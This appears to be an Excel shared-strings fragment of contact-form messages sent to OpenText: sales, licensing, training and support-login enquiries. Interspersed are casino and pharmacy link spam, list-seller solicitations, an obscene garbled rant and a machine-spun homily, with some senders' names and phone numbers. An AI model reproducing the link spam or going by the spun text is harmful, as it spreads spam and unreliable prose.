    <t>Please confirm cost in Canadian dollars for Government of Canada employee for Mar 26, 2018  On-site  3-0177  English  Ottawa, ON - OpenText.  I need to have the cost in order to process approval for her registration on the course.</t>
  </si>
  <si>
    <t>On 07.12. 17, I paid 154,00 PLN for Avast Premier, order ALLSOFT-10079854, Invoice A0010079854, confirmation no 5164-7310-6677-4432. Avast informs me I have no protection. Please check if Avast received the payment and inform.please.Kind regards, Slawomir Lesiak.</t>
  </si>
  <si>
    <t>Hi team_x000D_
_x000D_
I need a budget for the detailed in ticket 115013/2018 Open Text- Change or add Status descript_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">We may need licenses for remote work to Linux servers.  Are your licenses sold by computer/program/organization?  </t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Regarding Build Engineer Position (17943)</t>
  </si>
  <si>
    <t>We have a large customer currently using an OpenText Rightfax Connect cloud system hosted by a third party. They are considering bringing their fax solution in-house with their own OpenText system and have tasked us with studying the feasibility of this. I have some questions regarding licensing, FOIP, and other capabilities. Could someone knowledgeable contact me? Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to renew our maintenance contract.  Please contact me, as we would like to do this as quickly as possible. </t>
  </si>
  <si>
    <t>Please take me off the Cordys mailing list (community-cordys@opentext.com)!!</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://onlinelistcasino24.com/]real money casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking forward to purchase the following product and as a part of the purchase we would like to request for a copy of the VPAT2.0 document. Please provide us the same for us to proceed with the product purchase._x000D_
_x000D_
https://www.opentext.com/what-we-do/products/customer-experience-management/intelligent-forms-automation/opentext-teleform_x000D_
</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I am looking to get in touch with someone from HR/Payroll in order to obtain a verification of employment. Any help you can provide is appreciated!_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>We required for fax service as we request for urgent attention._x000D_
_x000D_
Andy Hildreth _x000D_
(Branch Manager)_x000D_
Ashley HomeStore_x000D_
700 Williard Dr_x000D_
Green Bay, Wisconsin 54304_x000D_
Tel. (920) 280-0606_x000D_
www.ashleyfurniturehomestore.com</t>
  </si>
  <si>
    <t>Regards,_x000D_
 _x000D_
My name is Ted and I called regarding your old electronics disposal. Here is basic info about our company as well as my info, and feel free to contact me when you have something to dispose of. We can arrange a free pickup service, free data wiping service which comes with a certificate 7 to 15 days upon completion of a pickup, data shredding service has a fee of 5 $ per hard drive and it comes with a certificate of destruction also. All collected equipment is getting refurbished and donated across country. If you have more than 5 pieces of IT related equipment working or not (old pc's, laptops, monitors, printers, fax machines etc.) pickup is completely free of charge. We can pick the equipment up at your facilities, we use trucks. Here is some more info about us and feel free to ask me anything. Our main goal is to help those in need, with donations events to various organizations._x000D_
 _x000D_
Electronic Recycling Association (new.era.ca)._x000D_
 _x000D_
We are a Not for Profit Organization dedicated in reducing electronic waste through the reuse and recycling of unwanted electronic/IT equipment. We collect all kinds of equipment (computers, laptops, monitors, printers, telephones etc.). Then we refurbish it and donate to various charities and non-profit organizations. _x000D_
This is what we can do for you:_x000D_
-        Pick up all of your old IT &amp; electronic equipment you don`t need any more at your site,_x000D_
-        Remove all of your company`s data from computers according to NAID standards (free hard-drive wiping services plus data removal certificate, hard drive shredding service),_x000D_
-        Refurbish your donated items and donate them to local charities in need on your behalf._x000D_
-        Recycle locally all of the equipment that cannot be reused._x000D_
Please contact me directly if you have any electronic equipment for disposal or if you need any further information about our services. Just send an email with approximate list of items you want to dispose of and I’ll contact you ri</t>
  </si>
  <si>
    <t xml:space="preserve">We have been using trial version but now need to purchase.  We require Brava Reader Desktop app_x000D_
“Brava Reader  Build 16.2.0.149 Pack: 16.2.0.76 OpenText™ Brava! &amp; not sure which one this is on your list of products - is the cost to be renewed annually and is there any savings if it needs to be installed on three pcs?  Many thanks_x000D_
</t>
  </si>
  <si>
    <t>Estou fazendo uma análise da ferramenta e gostaria de ter uma lista de órgãos públicos que utilizam a ferramenta  Enterprise Content Management (ECM)._x000D_
_x000D_
Cordialmente</t>
  </si>
  <si>
    <t>We are starting a new law firm and are evaluating document and email management software.</t>
  </si>
  <si>
    <t>Looking for Document management system and procurement solution for indirect procurement. E-auction or an e-bidding process is not required. We have SAP as our p2p process (PO process) and Salesforce for contract management process. The Procurement/RFP files are stored on sharepoint. _x000D_
If there are some demo available than we would like see them. Thank for your help. Regards,_x000D_
Laveena</t>
  </si>
  <si>
    <t xml:space="preserve">Client Support Contract </t>
  </si>
  <si>
    <t xml:space="preserve">Y have a problem to dowloading de DXP 16.3._x000D_
</t>
  </si>
  <si>
    <t>for career opportunity</t>
  </si>
  <si>
    <t>Hello, I received a mail for a Certificate modification for OFTP2 certificate modification. is old certificate still valid after 11th March ? or can we anticipate the modification by modifying the certificate on Friday ?</t>
  </si>
  <si>
    <t>Hello,_x000D_
We have used Centura Team Developer 2.0 to develop our application for fifteen years. Now, he have to decide either completely change technology or upgrade to Opentext Team Developer 7.0._x000D_
We have big problem with size of sources, there are over the limit, so we have problem with compiling. How large could be sources in Team Developer 7.0?_x000D_
Another question is about localization. There are, for example on grid, functions which provide to sum or average but layout is in English. We are trying it on trial version. How it works in full version – should we translate it ourselves or you will provide polish version?_x000D_
Best regards _x000D_
Michał Rybczyński</t>
  </si>
  <si>
    <t xml:space="preserve">please provide us quotation for ( OpenText™ Brava! for Desktop ) for 26 users_x000D_
and also provide us , this it will be pay for only first  time or we have to yearly renew  _x000D_
_x000D_
thanks_x000D_
</t>
  </si>
  <si>
    <t>We are in need of Brava! Desktop TXL-N 200users；_x000D_
I hope you can quote me the best price with a reseller's discount  soon .</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
For three new team members we would like to offer an eDOCS DM course, preferably on site at our office in Groningen, the Netherlands._x000D_
_x000D_
We currently work on technical support for DM 10._x000D_
_x000D_
Can you tell us what training you would consider most suitable? Possible dates? And the cost?_x000D_
_x000D_
Our new members will (probably) start April 1st._x000D_
_x000D_
Thank you for your help!_x000D_
_x000D_
Yours truly,_x000D_
_x000D_
Mart Platje </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Le groupe AXA et le groupe Talan (www.Talan.com) vous proposent de participer au AI Day, powered by AXA &amp; Talan, qui se tiendra le 16 avril 2018 dans les locaux du groupe AXA, 23 avenue Matignon, Paris._x000D_
_x000D_
 Nous vous donnons ainsi l’opportunité de contribuer à l’émergence de solutions d’Intelligence Artificielle opérationnelles dans le domaine de l’assurance, en nouant des partenariats concrets avec le groupe AXA pour optimiser l’efficacité opérationnelle et les services clients du groupe._x000D_
_x000D_
_x000D_
L’objectif de la journée est de sélectionner, parmi 20 des start-ups les plus ambitieuses du secteur, une start-up pour chacune des thématiques suivantes :_x000D_
_x000D_
_x000D_
Voyage –  Comment automatiser et personaliser l'aide médicale aux clients lors de leurs déplacements à l'étranger ?_x000D_
Habitation – Comment simplifier et automatiser les échanges entre AXA et les pourvoyeurs de services (plombiers, électriciens, serruriers, ...) ?_x000D_
Automobile – Comment simplifier la gestion des accidents mineurs ?_x000D_
Automobile -  Comment simplifier et automatiser la relation entre AXA et les services d'assistance routière ?_x000D_
_x000D_
_x000D_
Concrètement, vous aurez la possibilité, devant un auditoire composé d’opérationnels et de décideurs AXA, ainsi que des consultants experts en IA du groupe Talan, de :_x000D_
_x000D_
·       Présenter votre solution_x000D_
_x000D_
·       Echanger avec les experts IA et les collaborateurs AXA pour nouer des partenariats concrets_x000D_
_x000D_
·       Participer à la sélection_x000D_
_x000D_
Si vous êtes intéressé, merci de remplir le formulaire sur : https://www.talan.com/talan-axa-2018/  avant le 16 mars  2018._x000D_
_x000D_
_x000D_
Veuillez noter que nous vous fournirons plus d'informations sur chacun des cas une fois votre candidature soumise._x000D_
N'hésitez pas à nous contacter pour recevoir le NDA relatif à votre participation._x000D_
_x000D_
_x000D_
Très cordialement,_x000D_
_x000D_
Le groupe Talan.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi, hope you are a OpenText consultant. _x000D_
_x000D_
We have 2,983 Ready-To-Buy OpenText Technology Customers List from UK._x000D_
_x000D_
Test file will be given to review and check quality. _x000D_
_x000D_
Do you want to see the test file? _x000D_
_x000D_
_x000D_
Thank you _x000D_
_x000D_
_x000D_
Regards _x000D_
_x000D_
Cathy Henry _x000D_
cathy.henry@mybeta4.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Good Morning, _x000D_
We are a relatively new program office for Pratt &amp; Whitney, located in Lucerne, Switzerland and we are looking or a data management solution for all our Program departments which we have here: Legal, Engineering, Quality, Finance, Procurement. We are looking for a solution that can help us with version and author control, balloting, effective search function, restricted access and potentially also sharing of data with other organizations. Do you have a Swiss representative that we could be put in touch with, or who could come and present some options to us? _x000D_
Kind Regards,_x000D_
Olivia</t>
  </si>
  <si>
    <t>Looking for Malaysia's re-seller</t>
  </si>
  <si>
    <t>Would like to under cost of training for a batch of 15 to 20 folks on Open text Streme Serve.</t>
  </si>
  <si>
    <t>_x000D_
Good morning,_x000D_
I would like information on the Accell / Els 6.0 license expiring on 12/31/2020._x000D_
(Runtime-Development)._x000D_
Is there a possibility of having a license extension?_x000D_
I would need an answer in a short time otherwise we change platform._x000D_
Thank you and good day_x000D_
MASSIMO (consultant)</t>
  </si>
  <si>
    <t>Good morning_x000D_
I am a consultant and I would need to know if the version of Accell/ELS 6.0 with license expiring on 31/12/2020 has been postponed?_x000D_
Thank you</t>
  </si>
  <si>
    <t>Looking for change</t>
  </si>
  <si>
    <t xml:space="preserve">We have a requirement on Electronic Document Management System (EDMS) with one of our existing customers in USA. _x000D_
Let us know if OpenText EDMS can support these below mentioned high level features.   _x000D_
_x000D_
•             Workflow system _x000D_
•             Migration of all existing documents and data from the current system _x000D_
•             Front End Application written in VB6 _x000D_
•             Document Scanning _x000D_
•             ImportWord Module _x000D_
•             Archive Library _x000D_
•             Global Search Function _x000D_
•             Event Logging _x000D_
•             Export Documents as Email Attachment or to Local Drive _x000D_
_x000D_
Can we have a call/demo of the EDMS application?_x000D_
</t>
  </si>
  <si>
    <t>Would like to explore the product and use it for my personal store management for processing Invoices, Receipts.</t>
  </si>
  <si>
    <t>Evaluation of open text</t>
  </si>
  <si>
    <t xml:space="preserve">Registered with "My Support" but still cannot create support ticket. Please advise. Thanks. </t>
  </si>
  <si>
    <t>Последние медицинские новости здесь [url=http://griskomed.ru/]griskomed.ru[/url]</t>
  </si>
  <si>
    <t>We would like to contact the sales person for Exceed onDemand._x000D_
We have 10 to 15 Windows users that will remote access to 2 Linux servers.</t>
  </si>
  <si>
    <t xml:space="preserve">This is a terrific market, and from an industry leader like OpenText !   Perfect fit. </t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://onlinelistcasino24.com/]online slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>flagyl online _x000D_
[url=http://hqflagyl2017.com/]flagyl[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl online&lt;/a&gt; _x000D_
voltaren _x000D_
[url=http://hqvoltaren2017.com/]voltaren 50 mg[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren tablets&lt;/a&gt; _x000D_
voltaren tablets</t>
  </si>
  <si>
    <t>The support which I'm receiving from Nick Echard at this time is extremely poor. He doesn't seem at all interested in the circumstances in which the technical problems are occurring. He's simply trying to find a band-aid fix so that he can close the ticket as soon as possible. This technical support service is extremely poor.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are into IT Service solution provider and we are looking to be a part of your organization for your IT related requirements. Please forward us an inquiry. It would be our great pleasure to be a part of your great organization._x000D_
_x000D_
Kunal</t>
  </si>
  <si>
    <t>We would like to explore Exstream and its CM.</t>
  </si>
  <si>
    <t xml:space="preserve">We have been a re-seller of the Liquid Office products (via iManage) and would like to understand the current sales and support model. </t>
  </si>
  <si>
    <t>Hello. We are unable to login to our account. Please contact the person you have on-file for "Circle Graphics Inc" with our login email address. From there we can reset our password. Sorry, the account was created a long time ago and we are struggling just to find which email address to use. thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We have used Centura 2.0 to develop our application for fifteen years. Now, he have to decide either completely change technology or upgrade to Opentext centura 7.0._x000D_
We have big problem with size of sources, there are over the limit, so we have problem with compiling. How large could be sources in Centura 7.0?_x000D_
Another question is about localization. There are, for example on grid, functions which provide to sum or average but layout is in English. We are trying it on trial version. How it works in full version – should we translate it ourselves or you will provide polish version?_x000D_
Best regards _x000D_
Michał Rybczyński</t>
  </si>
  <si>
    <t>I used to use EasyLink Fax at my old job and wanted to see what pricing you offered now?</t>
  </si>
  <si>
    <t>Need to renew support for Teleform Workgroup version 10.9.2 software. Also need to open a support request for troubleshooting an issue once support is paid for.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to speak to someone in regards to some design help with our current system.  We are using Content Server 16.2 and have some information outside the system we want to bring in and also help setting up systems we have not implemented yet with our users. _x000D_
_x000D_
There also has been a need to provide access to our system outside our network and we were hoping for some assistance understanding this. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We currently own TrustedLink 6.5.3.0 it hasn't been working the greatest with Windows 10 (specially with certain updates). I'm wondering if you have an update or a new version for us to explore? _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cristiam Pino_x000D_
IT Manager_x000D_
The Indeka Group</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://onlinelistcasino24.com/]online slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;real money casino&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>OpenText Rfx Center</t>
  </si>
  <si>
    <t xml:space="preserve">I am having difficulty gaining access to Meijer's vendor site - I need access to Microstategy reports and am getting an error. </t>
  </si>
  <si>
    <t>Trading Partner, Raymour and Flanigan switching EDI vendors to EcUtopia and needs to test return docs 850,856,810, (with PO 850 already being sent thorugh EcUtopia.)_x000D_
both EDI IDs Ours at Natuzzi is, 12:3368880321 and ZZ:RAYMOURFLANIGAN, are on ICCNET platform of Easylink. What do we need to do to begin sending them test return docs to make sure they work ok?</t>
  </si>
  <si>
    <t>need support docs for opentext for salesforce</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in learning more about your solution for virtual files with a focus on Human Resource/Personnel files._x000D_
_x000D_
Thanks,_x000D_
Rebecca_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>free casino games and poker _x000D_
[url=http://onlinelistcasino24.com/]online casinos for us players[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
casino games slots free heart of vegas</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting information on licensing for Content Server. </t>
  </si>
  <si>
    <t xml:space="preserve">Nu Horizons/NIC/Arrow (customer # 10068589) is looking at moving their iSeries environments to a cloud based hosted solution. The iSeries that we are looking to move on to is a Power8 S814 with a processor group of P10. My questions to you are: _x000D_
_x000D_
1)	Are there any costs associated with transferring the license to a new iSeries? _x000D_
2)	Are there any issues in using a hosted solution?_x000D_
_x000D_
Thanks in advance for your help.     _x000D_
_x000D_
Regards, _x000D_
_x000D_
John Daley_x000D_
</t>
  </si>
  <si>
    <t>flagyl antibiotic _x000D_
[url=http://hqflagyl2017.com/]flagyl antibiotic[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl&lt;/a&gt; _x000D_
voltaren _x000D_
[url=http://hqvoltaren2017.com/]voltaren 50 mg[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren tablets&lt;/a&gt; _x000D_
voltaren 50 mg</t>
  </si>
  <si>
    <t>Desejo receber meus extratos bancários do Bradesco via Van. Solicito Orçamento para habilitação de cx postal.</t>
  </si>
  <si>
    <t>flagyl antibiotic _x000D_
[url=http://hqflagyl2017.com/]flagyl antibiotic[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl&lt;/a&gt; _x000D_
voltaren 50 mg _x000D_
[url=http://hqvoltaren2017.com/]voltaren 100 mg[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 50 mg&lt;/a&gt; _x000D_
voltaren tablets</t>
  </si>
  <si>
    <t>Currently using Report Builder 2005.1, and I think it's time to upgrade.  What is involved and what would the cost be?</t>
  </si>
  <si>
    <t xml:space="preserve"> Dear Sir , We have an issue with AppExtender 7.0 and windows 10. Error code a com error has encountered . code  80004005</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t xml:space="preserve">Gostaria de obter um ponto de contato para conversar sobre mais detalhes da solução de ECM de vocês. </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get in touch to see what the possibilities are to outsource some of our work, in particular the creation of statements. </t>
  </si>
  <si>
    <t>flagyl _x000D_
[url=http://hqflagyl2017.com/]buy flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl online&lt;/a&gt; _x000D_
voltaren tablets _x000D_
[url=http://hqvoltaren2017.com/]voltaren[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 50 mg&lt;/a&gt; _x000D_
voltaren</t>
  </si>
  <si>
    <t>Trying to login to support page, but after login I'll get "Error Page" message from opentext portal. I need to be in Telia (Teliasonera, Telia Company) account as administrator with all accesses and priviliges. (Access to downloads, add users to our profile etc..)</t>
  </si>
  <si>
    <t>Need a trial download code and link today of Redaction functionality (only) of eDiscovery sute.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Would you kindly provide me with the Innovation Tour Agenda. I am required to submit it prior to validate my participation._x000D_
Regards,_x000D_
Milos Jacevski</t>
  </si>
  <si>
    <t>I was a Fax2Mail customer for years.  Recently, I went to the old fax2mail.com domain and was redirected to the new OpenText portal.  Unfortunately under the new OpenText portal, I cannot download or print my monthly billing statements for the Fax2Mail service. Could you please let me know how I can do that?</t>
  </si>
  <si>
    <t>Does Exceed 15 support Windows 10?</t>
  </si>
  <si>
    <t>flagyl online _x000D_
[url=http://hqflagyl2017.com/]flagyl[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl&lt;/a&gt; _x000D_
voltaren _x000D_
[url=http://hqvoltaren2017.com/]voltaren 100 mg[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren&lt;/a&gt; _x000D_
voltaren 50 mg</t>
  </si>
  <si>
    <t>buy flagyl online _x000D_
[url=http://hqflagyl2017.com/]buy flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;buy flagyl online&lt;/a&gt; _x000D_
voltaren 50 mg _x000D_
[url=http://hqvoltaren2017.com/]voltaren 100 mg[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 50 mg&lt;/a&gt; _x000D_
voltaren 50 mg</t>
  </si>
  <si>
    <t>Looking for Cloud fax solution</t>
  </si>
  <si>
    <t>I have just submitted my CV via your Careers site but would like to make contact with your Recruitment team as I saw a job on Linked-In for a Director, EMEA Billing Operations.  It states that you are not accepting any more applications but my role is very similar to that and I've just been given notice of redundancy with my current company.  Therefore I would like to see if there is still an opportunity to apply for that role in Reading.  Thank you</t>
  </si>
  <si>
    <t>We are needing to download Captiva Quick Scan Pro on a replacement laptop. ASAP</t>
  </si>
  <si>
    <t>We have a Citrix server with 10 users were we would like to use Brava Viewer for Autocad only. Do you also have network licenses available? In the web we can only find the option to purchase stand alone licenses._x000D_
Best Regards_x000D_
Gerardo Pucciarelli</t>
  </si>
  <si>
    <t>Dear all,_x000D_
We currently have Opentext Dialogue V9.R5.M304 and Exstream MQ Connector V2.R10.M007 installed on z/OS 2.1. We are planning to migrate to z/OS 2.3 soon._x000D_
Could you please confirm whether the above mentioned products are compatible with z/OS 2.3 and if additional maintenance has to be installed. In the latter case, could you provide us with direction on how to get the maintenance._x000D_
Thanks in advance_x000D_
Best regards_x000D_
Charles Lehmann</t>
  </si>
  <si>
    <t>I am unable to open  not able to sign into My Support. I do not want to call by Phone, so please advice the better way using email</t>
  </si>
  <si>
    <t xml:space="preserve">We have a client in Norway, upgrading to 7.5 SP6, we are encountering issues in when both Vendor VAT Numberand Tax account number have values. Prior updgrade, even if the field VAT number and Tax account Number have values there has no issue. But on the upgraded version testing results is giving an error "Invalid VAT Number" during DP indexed. When tax account number is removed and only VAT number remain, the DP will not give any error. Can you please advice what might cause this issue that if tax account number is filled up the DP cannot proceed, is there a missing set up or validation? </t>
  </si>
  <si>
    <t>Please provide the link to download the software. The support page keep asking for "REQUEST CONFIRMATION EMAIL".... No way out. Complicated and not user friendly. I just need the download link.</t>
  </si>
  <si>
    <t>We are an Insurance company that insure Opentex Sapin for the Group life Policy for the employees, Open Tex Spain hasn´t pay the premiums of the insurance and we need a rush payment asap.</t>
  </si>
  <si>
    <t>Hi, I am a Tax Partner of Deloitte Chile and we are interested in a solution on premise to implement a workshare system and a information repository.  It is not allow to implement any cloud solution.  Is it possible that you will perform us a demo of your solution as soon as possible, if it is in spanish wil be better but in english it would be not a problem.  Any contact, please send me an email._x000D_
_x000D_
Thank you for your time._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Eduardo Vargas</t>
  </si>
  <si>
    <t>I WANT TO DOWNLOAD BRAVA DESKTOP CXL. I already paid. This is urgent.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext Team,_x000D_
_x000D_
Please share details of “Documents Management System” that you offer. It must contain following, but not limited to, features._x000D_
We will appreciate if you can submit your offer at the earliest. Looking forward to hear from you soon._x000D_
_x000D_
•	Hierarchical and modular access control using role-based _x000D_
•	Automatically classify documents based using Key words, fingerprinting, anomaly detection etc. _x000D_
•	Comply to Vodafone Qatar Data retention policy _x000D_
•	Clear Audit trail and reporting shall be maintained to ensure who accessed which document from where and when._x000D_
•	System shall label the document as per the proposed document labelling as suggested in Vodafone document management retention guidelines._x000D_
•	System shall identify and tag customer specific personally sensitive data like name, gender, age, DoB, National ID etc. _x000D_
•	System shall identify &amp; tag PCI-DSS standard information like Credit card details and banking details._x000D_
•	Once uploaded, users should not be allowed to delete / modify documents_x000D_
•	User access control that enables: _x000D_
o	Normal users can only view documents uploaded by themselves_x000D_
o	Users with special access to be able to view files uploaded by their team / function_x000D_
o	Super users can download, delete documents_x000D_
•	Version control: Manage multiple versions of the same document to identify changes and more recent version _x000D_
•	Auto-sync: Users can select files or folders to upload automatically periodically_x000D_
•	Reporting: on users and how frequently they are uploading documents to the repository_x000D_
_x000D_
_x000D_
Regards,_x000D_
Rashid_x000D_
</t>
  </si>
  <si>
    <t>For myself</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam, _x000D_
_x000D_
I am a sole-trader looking to set up a small UK-based wine business, to be named "Vignette". _x000D_
_x000D_
I understand that your company still owns the domain of Vignette.com / Vignette.co.uk, based on a legacy name of your business. _x000D_
_x000D_
I wanted to enquire if you might be interested in relinquishing the domain name?_x000D_
_x000D_
I'd really appreciate if you could pass this on to the appropriate person. _x000D_
_x000D_
Many thanks in advance, _x000D_
Sophie_x000D_
_x000D_
+44 (0) 7757 727998_x000D_
Sophie Griffiths_x000D_
</t>
  </si>
  <si>
    <t>to find out more about your services</t>
  </si>
  <si>
    <t>Encase training requirements - both trainer led and on demand.  Participants are all law enforcement officers.</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Dear concerned,_x000D_
_x000D_
I was wondering if OpenText is offering any internship opportunities?_x000D_
_x000D_
Best,_x000D_
Mohamad</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I am contacting with interest in one of the training you are providing, 3-3710 OpenText Communication Center Enterprise Fundamentals v16 on the Apr 16, 2018 in Stockholm._x000D_
_x000D_
I have an interest in sending one person to this training but i will have the exact details in the beginning od paril. I'd still like to book one place for the trainig and pay the invoice in april with Credit Card._x000D_
_x000D_
Is this possible?_x000D_
_x000D_
Regards,_x000D_
Grete Napits</t>
  </si>
  <si>
    <t>We are looking for a software integrator in Canada, which will resell and support Singlepoint software suite which covers business process management, document management, business intelligence, health&amp;safety, quality management and product development._x000D_
_x000D_
Singlepoint is developed by Syncronology (www.syncronology.com), which is a UK based software company with 400 industrial clients._x000D_
_x000D_
We identified OpenText as a potential partner._x000D_
_x000D_
Please get back for more information if you are interested.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello and Good Day_x000D_
_x000D_
I am Mike Alias Sanjeev ,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Mike Alias  Sanjeev_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Problems with downloading audio files on an Ipad for playing. What is going on? My wife uses First Class through Middlebury College and has it on her Ipad. Whenever someone sends her an audio (mp4) file, it won't play or download properly. What can be done about this? It's the only way she can communicate as she is bed bound and house bound due to illness. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi, hope you are a OpenText consultant. _x000D_
_x000D_
We have 1,568 Ready-To-Buy OpenText Technology Customers List from Australia._x000D_
_x000D_
Test file will be given to review and check quality. _x000D_
_x000D_
Do you want to see the test file? _x000D_
_x000D_
_x000D_
Thank you _x000D_
_x000D_
_x000D_
Regards _x000D_
_x000D_
Maggie Tylor _x000D_
maggie.tylor@zomo-online.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We were hoping your products will meet our Content Management and Publishing Platform project but it seems like your Asia Pacific office is too arrogant to talk to the prospective systems integrator that we are talking to. This is disappointing.  I guess if this is the type of customer relationship we would be expecting from your team, then, maybe it is good we are finding out now instead of later.  </t>
  </si>
  <si>
    <t>I was email to your to request quotation since last Wednesday 1/3/2018 but without any reply. Please provide me 3 nos. of IXL quotation. Thank you</t>
  </si>
  <si>
    <t>We are looking at automating ATE reporting in Engineering process, including interfacing or including statistical and trend data analyses</t>
  </si>
  <si>
    <t>We have bought Exceed onDemand License. But we don't know how to associate the license with opentext account.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
_x000D_
This is Derrick Liau, SAP Consultant from MTU Asia Pte Ltd supporting Opentext and SAP Connection._x000D_
_x000D_
I have registered my user id to access OpenText website as follows:_x000D_
• Your User ID: derrick.liau@mtu-online.com_x000D_
_x000D_
But I received below error:_x000D_
_x000D_
403 - Forbidden: Access is denied._x000D_
_x000D_
You do not have permission to view this directory or page using the credentials that you supplied._x000D_
_x000D_
Please help to grsant my access as we need to support the Opentext and SAP connection for project rollout._x000D_
_x000D_
Please find below the message from Peter Niepel, Opentext Consultant to access the patches and support notes._x000D_
_x000D_
With regards,_x000D_
Derrick_x000D_
_x000D_
-----------------------------------------------------------------------------_x000D_
Dear Bettina,_x000D_
_x000D_
Please find below the link to the requested CI:_x000D_
_x000D_
_x000D_
http://mimage.opentext.com/support/ecm/secure/patches/vim/ci/7.5/sp07/vim_75_sp07_vimi-19077_ci-92.pdf_x000D_
_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Peter Niepel_x000D_
Opentext</t>
  </si>
  <si>
    <t>Goodnight,_x000D_
_x000D_
I write to know if there are certifications for the OpenText Exstream suite._x000D_
_x000D_
Thank you in advance for your help._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>My Login is disabled, Why?</t>
  </si>
  <si>
    <t>Problem to login knowledge centre. It show error message on screen. Please assist.</t>
  </si>
  <si>
    <t>Your           reddot.c om more russin pussy you mwt $200million Dollars the Oscars Hollywwod Pirates treasure , treasure Island las vegas the devil Triangale . deveil mountians.Califirna Amtrack trains building AMERICA.</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t xml:space="preserve">fernrrstliche most women Theologians Homily during the initial Liturgy for EWA 3_x000D_
_x000D_
nowadays in this gospel lomaz identifies that's jesus set on the Nazareth synagogue "about Sabbath day, As was previously the length of his traditions, lenny, which of you locales impressive impact on the subject of jesus as being in total con theformity judaism initiative since the Hebrew Scriptures, focuses on christ to be a steadfast in addition serious Jew which are, to be his or guy villagers, habitually had one aspect from our Sabbath services in addition,yet hopes. it is,it can also be good value for money that will help underscore once again Jesus' full attachment (On human being amount) into the jewish local community. Jesus' Jewishness isn't a disaster including a story that can cause covered aside, yet unfortunately is a result of the version; It set in judaism skin of the fact that god's youngster was incarnate, this kind of has precise theological risks we must not hide or pay no attention to. jesus was a loyal youngster as to Israel._x000D_
_x000D_
